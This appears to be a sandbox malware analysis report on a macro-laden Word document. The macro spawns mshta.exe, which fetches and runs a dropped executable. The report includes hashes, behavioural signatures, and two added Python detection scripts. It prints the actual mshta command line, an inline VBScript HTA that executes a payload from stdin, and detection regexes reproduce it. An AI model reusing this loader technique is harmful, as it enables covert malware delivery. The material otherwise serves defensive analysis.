Analysis
max time kernel: 144s
max time network: 143s
platform: windows10_x64
resource: win10v20210410
submitted: 10-05-2021 16:09

Tasks
Static task: static1
Behavioral task: behavioral1 (Sample: document.docm, Resource: win7v20210408)
Behavioral task: behavioral2 (Sample: document.docm, Resource: win10v20210410)
General
Target: document.docm
Size: 68KB
MD5: da3992522a61736e5dbc5c32978f05fe
SHA1: 670f0d608571fa8d799a98232cf2c16e8ccb9289
SHA256: e6afaabd1e4a2c7adeedca6ee0ed095271a53a293162e3cf7ed52d570279258e
SHA512: a2c3eee48add8eabf4fbe86a9e699fda302c143823f6ea3a629becf03d3d539aacfeabce52514e4b73e0db6d827031aec13e576a113f0aec92d0f7eb92f1c32a
Malware Config
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description                                                                                              pid   pid_target  process    target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  3988  508         mshta.exe  WINWORD.EXE
Blocklisted process makes network request 3 IoCs
Processes:
flow  pid   process
24    3988  mshta.exe
26    3988  mshta.exe
28    3988  mshta.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs
Processes:
pid   process
1292  task-7655.exe
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WINWORD.EXE, File opened (read-only): \??\N: \??\Q: \??\R: \??\T: \??\U: \??\X: \??\G: \??\I: \??\O: \??\P: \??\V: \??\W: \??\B: \??\L: \??\F: \??\H: \??\J: \??\S: \??\Z: \??\A: \??\E: \??\Y: \??\K: \??\M:
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description        ioc                                                                              process
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                  WINWORD.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz            WINWORD.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WINWORD.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description        ioc                                                         process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               WINWORD.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description             flow  ioc
HTTP User-Agent header  24    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  26    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  28    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
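The "Blocklisted process makes network request", "Downloads MZ/PE file" and "Script User-Agent" signatures above are all judgements over the same HTTP flows. The following is an added example, not part of the sandbox report, that applies those three checks to a list of flows: it matches the WinHttp.WinHttpRequest User-Agent, flags a script host as the requesting process, and decides whether a response body is a PE by following the MZ header's e_lfanew to the "PE\0\0" signature rather than trusting the first two bytes alone. The flow ids, pid and User-Agent are taken from this report; the response bodies are placeholders, and the assumption that flow 24 carried the PE is mine (the report does not say which flow did).

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# User-Agent of the WinHTTP COM object that VBScript/JScript in mshta, wscript
# and Office macros use; this is the string recorded for flows 24/26/28.
SCRIPT_UA = re.compile(r"WinHttp\.WinHttpRequest", re.I)
# Script hosts whose outbound HTTP the report blocklists (list is an assumption).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass
class Flow:
    flow_id: int
    pid: int
    process: str
    user_agent: str
    body: bytes  # response body as captured; the first few hundred bytes suffice


def is_pe(body: bytes) -> bool:
    """True if body has an MZ header whose e_lfanew points at a 'PE\\0\\0' signature.

    Following e_lfanew (offset 0x3C) avoids flagging text that merely starts with
    'MZ', and the bounds checks keep a truncated or hostile body from raising."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(body[0x3C:0x40], "little")
    if e_lfanew < 0x40 or e_lfanew + 4 > len(body):
        return False
    return body[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def analyze_flows(flows: List[Flow]) -> List[Tuple[int, str]]:
    """Return (flow_id, signature) pairs for the three network signatures."""
    findings = []
    for f in flows:
        if f.process.lower() in SCRIPT_HOSTS:
            findings.append((f.flow_id, "blocklisted_process_network_request"))
        if SCRIPT_UA.search(f.user_agent):
            findings.append((f.flow_id, "script_user_agent"))
        if is_pe(f.body):
            findings.append((f.flow_id, "downloads_mz_pe_file"))
    return findings


def minimal_pe() -> bytes:
    """Constructed MZ stub with e_lfanew = 0x40 followed by the PE signature.
    A stand-in for the downloaded executable, not the real task-7655.exe."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)          # 0x40-byte DOS header
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")     # e_lfanew -> right after it
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

# Constructed flows using the ids, pid and UA from this report. Bodies are
# placeholders; which flow returned the PE is an assumption.
SAMPLE_FLOWS = [
    Flow(24, 3988, "mshta.exe", UA, minimal_pe()),
    Flow(26, 3988, "mshta.exe", UA, b"OK"),
    Flow(28, 3988, "mshta.exe", UA, b""),
    Flow(30, 2222, "chrome.exe", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", b"<html>"),
]

if __name__ == "__main__":
    for flow_id, sig in analyze_flows(SAMPLE_FLOWS):
        print(f"flow {flow_id}: {sig}")
```

A real deployment would feed `Flow` objects from a proxy or sandbox PCAP; the pid/process mapping is what lets the User-Agent hit be tied back to mshta.exe rather than to a browser that legitimately fetched an installer.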
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
pid  process
508  WINWORD.EXE
508  WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description                      pid  process
Token: SeShutdownPrivilege       508  WINWORD.EXE
Token: SeCreatePagefilePrivilege  508  WINWORD.EXE
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid  process
508  WINWORD.EXE
508  WINWORD.EXE
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
pid  process
508  WINWORD.EXE (8 occurrences)
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
description                         pid   process      target process
PID 508 wrote to memory of 504      508   WINWORD.EXE  splwow64.exe
PID 508 wrote to memory of 504      508   WINWORD.EXE  splwow64.exe
PID 508 wrote to memory of 3988     508   WINWORD.EXE  mshta.exe
PID 508 wrote to memory of 3988     508   WINWORD.EXE  mshta.exe
PID 3988 wrote to memory of 1292    3988  mshta.exe    task-7655.exe
PID 3988 wrote to memory of 1292    3988  mshta.exe    task-7655.exe
PID 3988 wrote to memory of 1292    3988  mshta.exe    task-7655.exe
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (pid 508)
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\document.docm" /o ""
  - Enumerates connected drives
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\splwow64.exe (pid 504)
    C:\Windows\splwow64.exe 12288

  C:\Windows\SYSTEM32\mshta.exe (pid 3988)
    mshta.exe "about:<script language=VBScript>moveTo 0,-9999:Execute(CreateObject("Scripting.FileSystemObject").GetStandardStream(0).ReadAll()):sub window_onload:Close:End Sub</script><hta:application showintaskbar=no />"
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\task-7655.exe (pid 1292)
      "C:\Users\Admin\AppData\Local\Temp\task-7655.exe"
      - Executes dropped EXE
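The process tree is the most durable detection surface in this report: Word spawning mshta.exe, mshta.exe being handed an inline "about:" HTA that Execute()s whatever the macro writes to its stdin (so no .hta ever touches disk), and the script host then launching an executable out of %LocalAppData%\Temp. The following is an added example, not the sandbox's own code, that expresses those three checks over Sysmon-style process-creation records and walks the ancestry of the dropped EXE back to Word. The pids, image paths and command lines are taken from the tree above; the explorer.exe parent, the list of "expected" Office children (only splwow64.exe, as seen here) and the script-host list are my assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event ID 1 or an EDR equivalent)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Office hosts that should not be launching script interpreters.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children Office starts legitimately; splwow64.exe (print driver shim) appears in this report.
# Assumption: an allow-list this short will need tuning per environment.
EXPECTED_OFFICE_CHILDREN = {"splwow64.exe"}
# Script/LOLBin hosts whose own children deserve scrutiny (assumed list).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# mshta given an inline about: HTA that reads its real payload from stdin,
# exactly the command line recorded on this page.
STDIN_HTA = re.compile(r"about:<script.*GetStandardStream\(0\)", re.I | re.S)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def analyze(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule, detail) findings for the three lineage rules."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for e in events:
        child = basename(e.image).lower()
        parent: Optional[ProcEvent] = by_pid.get(e.ppid)
        pname = basename(parent.image).lower() if parent else ""
        if pname in OFFICE_APPS and child not in EXPECTED_OFFICE_CHILDREN:
            findings.append((e.pid, "office_spawned_unexpected_child", f"{pname} -> {child}"))
        if child == "mshta.exe" and STDIN_HTA.search(e.cmdline):
            findings.append((e.pid, "mshta_inline_stdin_script",
                             "HTA body is inline and pulls its payload from stdin"))
        if pname in SCRIPT_HOSTS and child.endswith(".exe") and TEMP_DIR.search(e.image):
            findings.append((e.pid, "script_host_executed_temp_exe", f"{pname} -> {e.image}"))
    return findings


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Walk ppid links upward; cycle-safe so a recycled pid cannot loop forever."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


# Constructed events mirroring the process tree in this report (pids from the report;
# the explorer.exe parent of WINWORD.EXE is assumed).
SAMPLE_EVENTS = [
    ProcEvent(1000, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(508, 1000, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\document.docm" /o ""'),
    ProcEvent(504, 508, r"C:\Windows\splwow64.exe", "C:\\Windows\\splwow64.exe 12288"),
    ProcEvent(3988, 508, r"C:\Windows\SYSTEM32\mshta.exe",
              'mshta.exe "about:<script language=VBScript>moveTo 0,-9999:'
              'Execute(CreateObject("Scripting.FileSystemObject").GetStandardStream(0).ReadAll()):'
              'sub window_onload:Close:End Sub</script><hta:application showintaskbar=no />"'),
    ProcEvent(1292, 3988, r"C:\Users\Admin\AppData\Local\Temp\task-7655.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\task-7655.exe"'),
]

if __name__ == "__main__":
    for pid, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
    print(" <- ".join(ancestry(SAMPLE_EVENTS, 1292)))
```

The stdin rule is the one worth keeping even if the others are tuned down: a legitimate HTA is a file on disk, so a command line that carries the whole HTA inline and calls GetStandardStream(0) has no benign reason to exist, and it survives renaming of the dropped executable.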
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\task-7655.exe
MD5: ff9114e748fe6848ffe61cad56a10622
SHA1: 92d27cf7f04ae2213bc94fafa554247565ea7253
SHA256: 6f406656b410d72762ddc2419076efadc16d07e9a1e7b10fd91e9c53281efe06
SHA512: 6ec36ab0c2df6046ca2b1251cc736753892fd8514366ee8b395e276e5c31fe6e6c743ea94c7b5b8a63b773584bf3ad788d3be77c3d3ad2cdb2b62aab15c4a54e
memory/504-179-0x0000000000000000-mapping.dmp
memory/508-119-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp (64KB)
memory/508-181-0x000001AB0F530000-0x000001AB0F540000-memory.dmp (64KB)
memory/508-118-0x00007FF970E10000-0x00007FF973933000-memory.dmp (43.1MB)
memory/508-122-0x00007FF969780000-0x00007FF96A86E000-memory.dmp (16.9MB)
memory/508-123-0x00007FF967880000-0x00007FF969775000-memory.dmp (31.0MB)
memory/508-117-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp (64KB)
memory/508-115-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp (64KB)
memory/508-114-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp (64KB)
memory/508-183-0x000001AB0F530000-0x000001AB0F540000-memory.dmp (64KB)
memory/508-184-0x000001AB0F530000-0x000001AB0F540000-memory.dmp (64KB)
memory/508-182-0x000001AB0F540000-0x000001AB0F550000-memory.dmp (64KB)
memory/508-185-0x000001AB0F530000-0x000001AB0F540000-memory.dmp (64KB)
memory/508-186-0x000001AB0F530000-0x000001AB0F540000-memory.dmp (64KB)
memory/508-116-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp (64KB)
memory/1292-187-0x0000000000000000-mapping.dmp
memory/3988-180-0x0000000000000000-mapping.dmp